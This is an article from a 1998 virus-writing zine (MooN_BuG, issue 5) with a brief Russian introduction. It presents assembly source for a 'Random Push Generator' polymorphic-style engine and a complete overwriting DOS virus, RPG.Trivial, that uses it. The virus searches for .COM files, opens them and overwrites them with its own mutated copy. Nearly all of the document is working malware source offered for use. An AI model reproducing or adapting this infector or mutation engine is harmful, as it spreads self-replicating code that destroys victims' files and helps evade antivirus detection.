[TulaAnti&ViralClub] PRESENTS ...
MooN_BuG, Issue 5, May 1998 file 00C
··Random·Push·Generator·0.1··
·····························
·Most·unusefull·generator·:)·
·····························
·If·you·want·to·use·it:······
·····························
·don't·forget·about·offset!··
·····························
·bye.·FRiZER·················
·····························
·PS:·it's·not·my·idea·;)·····
·····························
Прочитал в AVP-weekly описание вируса Pusher и решил по его мативам сделал
свой энджин. Ниже то, что из этого получилось и пример его использования.
=== Cut ===
;┌[ Random Push Generator ]──────────[ v0.1 ]┐
;■ Input : CX - code length │
;│ : DS:SI - code to convert │
;│ : ES:DI - space for generated code │
;│ : with (CX * 2 + 2) lenght │
;■ Output : CX - generated code lenght │
;│ : AX, SI, DI - destroyed │
;└[ by FRiZER ]──────────────────────[ 1998 ]┘
RPG proc
cld
push di
shr cx,1 ; cx / 2
jnc RPG_loop
inc cx
inc si
RPG_loop:
RPG_rnd:in al,40h
and al,07h
cmp al,04h
je RPG_rnd
cmp al,ah
je RPG_rnd
mov ah,al
add al,0B8h ; mov rw,imm16 (rw <> sp)
stosb
movsw
sub si,4
or al,0F0h
and al,057h ; push rw
stosb
loop RPG_loop
mov ax,0E4FFh ; jmp sp
stosw
pop cx
sub cx,di
neg cx
ret
ver db '[RPG v0.1]'
RPG endp
=== Cut ===
Пример использования RPG в виде нерезидентного overwrite-вируса.
=== Cut ===
.model tiny
.386
.code
.startup
org 100h
z equ si-113h
vs equ e-s
vs2 equ (vs+1)/2
m:
std
lea si,e-2
mov cx,vs
shr cx,1 ; cx / 2
jnc mloop
inc cx
inc si
mloop:
lodsw
push ax
loop mloop
jmp sp
s:
mov si,sp
lea dx,[z+msk]
mov ah,4Eh
mov cx,20h
int 21h
jc er
jmp infect
findnext:
mov ah,4Fh
mov dx,80h
int 21h
jc er
infect: mov ax,3d02h
mov dx,9Eh
int 21h
jc er
xchg ax,bx
mov di,100h
mov cx,vs
push si di
add si,vs-2
call RPG ; cx = lenght
pop dx si
mov ah,40h
int 21h
mov ah,3Eh
int 21h
jmp findnext
er: mov cx,vs2*2
add sp,cx
mov ah,9
lea dx,[z+msg]
int 21h
ret
msg db '[RPG.Trivial]',13,10,'$'
msk db '*.com',0
include rpg.inc
e:
end
=== Cut ===
